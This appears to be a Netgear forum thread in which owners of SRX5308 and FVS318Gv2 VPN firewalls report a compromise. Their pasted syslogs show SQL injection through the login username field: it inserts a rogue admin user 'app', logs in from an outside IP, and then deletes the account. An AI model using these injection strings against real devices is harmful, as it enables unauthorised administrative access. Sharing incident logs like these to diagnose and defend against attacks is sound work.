Discussion stats
  • 4 replies
  • 2450 views
  • 0 kudos
  • 4 in conversation
Announcements

Top Contributors
Reply
Highlighted
Aspirant

Successful hack of our SRX5308

Hi,

Our SRX5308 was successfully hackedon Sep 27th. They seem to have found a SQL password that keeps users in a an internal database and injected a new user 'app'. We had SYSLOG to another machine ,so we caught the successful attempt and steps:

I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password

 

Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

 

Model: SRX5308|PROSAFE Gigabit Quad WAN SSL & IPSEC VPN Firewall
Message 1 of 5
Highlighted
Aspirant

Re: Successful hack of our SRX5308

It seems like a very old school DB injection during log in. Seems that Netgear does not db_escape their user input. Gawd!

Message 2 of 5
Highlighted
Tutor

Re: Successful hack of our SRX5308

These have been out of support for a little while now.  Sadly, Netgear hasnt' seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.

Message 3 of 5
Highlighted
Apprentice

Re: Successful hack of our SRX5308

This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500, end of support and firmware upgrades. Sadly, the BR500 is not reliable. 

The pessimist complains about the wind, the optimist hopes it will change, the engineer adjusts the sails...
Message 4 of 5
Highlighted
Aspirant

Re: Successful hack of our SRX5308

Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken. 

 

[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app

Model: FVS318Gv2|ProSafe gigabit 8 port VPN firewall
Message 5 of 5